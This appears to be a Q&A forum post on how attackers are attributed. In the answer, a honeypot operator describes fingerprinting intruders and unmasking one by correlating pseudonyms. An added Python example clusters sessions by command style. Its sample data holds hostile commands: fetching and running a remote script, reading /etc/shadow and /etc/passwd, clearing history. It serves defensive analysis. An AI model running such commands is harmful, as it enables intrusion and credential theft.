Question
Neophyte here. I didn't find much googling around, so I was hoping maybe someone here could point me in the right direction towards some literature that discusses this in more depth.
It's increasingly common to see major attacks on governments and corporations attributed to a specific country or group. Typically we don't know for certain, but it's at least suspected.
Given the general anonymity of the internet and the ability to hide behind proxies, exactly how do security experts go about determining exactly who perpetrated an attack?
Thanks in advance.
Explanation / Answer
As someone who runs my own honeypots and defends a corporation, I can tell you that any attack leaves fingerprints. Styles of commands or command sequence, coding style of malware, as well as the paths used by attackers can all point in the direction of an attacker.
For example, I was able to positively identify someone trapped in my honeypot because they used their real name as their password (they didn't know I was recording their keystrokes). Using various correlation methods, I was able to attribute the pseudonym they were using on the site they used to distribute malware to their name, including finding out that they had used the pseudonym on a singles site 2 years ago and deleted it (but Google's long memory did not forget).
Once you start studying live attacks, you can really start to see the people "behind the keystrokes" and that's one reason why I continue to operate honeypots. I think I can tell whether an attacker is Asian or Eastern European, simply by their methods, and not by their IP. If I had enough data from a known attacker, I believe I would be able to recognize their actions in a new environment.
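One way to turn the "style of commands" fingerprinting described in this answer into code, as an added example that is not part of the original post or the answerer's own tooling: it groups constructed honeypot sessions by the order in which commands were typed rather than by source address (the session data, addresses, and similarity threshold are all assumptions).

```python
from typing import Dict, List, Set, Tuple

# Constructed honeypot sessions (hypothetical data, not real captures):
# session id -> (source address, commands as typed by the intruder).
SESSIONS: Dict[str, Tuple[str, List[str]]] = {
    "s1": ("203.0.113.10", ["uname -a", "cat /proc/cpuinfo", "wget http://example.invalid/m.sh", "chmod +x m.sh", "./m.sh"]),
    "s2": ("198.51.100.7", ["uname  -a", "cat /proc/meminfo", "wget http://example.invalid/t.sh", "chmod 755 t.sh", "./t.sh"]),
    "s3": ("192.0.2.55", ["id", "ls -la /root", "cat /etc/passwd", "history -c"]),
    "s4": ("203.0.113.10", ["id", "ls -la", "cat /etc/shadow", "history -c"]),
}

def verb(cmd: str) -> str:
    """Reduce a command line to its program name so argument noise does not hide the habit."""
    tok = cmd.split()[0]
    return "./<script>" if tok.startswith("./") else tok

def fingerprint(cmds: List[str]) -> Set[Tuple[str, str]]:
    """Ordered pairs of consecutive verbs: the operator's habit of what follows what."""
    verbs = [verb(c) for c in cmds]
    return set(zip(verbs, verbs[1:]))

def jaccard(a: Set, b: Set) -> float:
    """Overlap between two fingerprints, 0.0 (nothing shared) to 1.0 (identical)."""
    return len(a & b) / len(a | b) if (a | b) else 0.0

def cluster(sessions: Dict[str, Tuple[str, List[str]]], threshold: float = 0.6) -> List[Set[str]]:
    """Greedily group sessions whose command-style fingerprints overlap, ignoring source IP."""
    fps = {sid: fingerprint(cmds) for sid, (_, cmds) in sessions.items()}
    groups: List[Set[str]] = []
    for sid in sessions:
        for g in groups:
            if any(jaccard(fps[sid], fps[other]) >= threshold for other in g):
                g.add(sid)
                break
        else:
            groups.append({sid})
    return groups

if __name__ == "__main__":
    for g in cluster(SESSIONS):
        ips = sorted({SESSIONS[s][0] for s in g})
        print(sorted(g), "share one command style; source addresses:", ips)
```

Note that s1 and s4 come from the same address yet land in different groups, while s1 and s2 come from different addresses and cluster together, which is the "by their methods, and not by their IP" point made above.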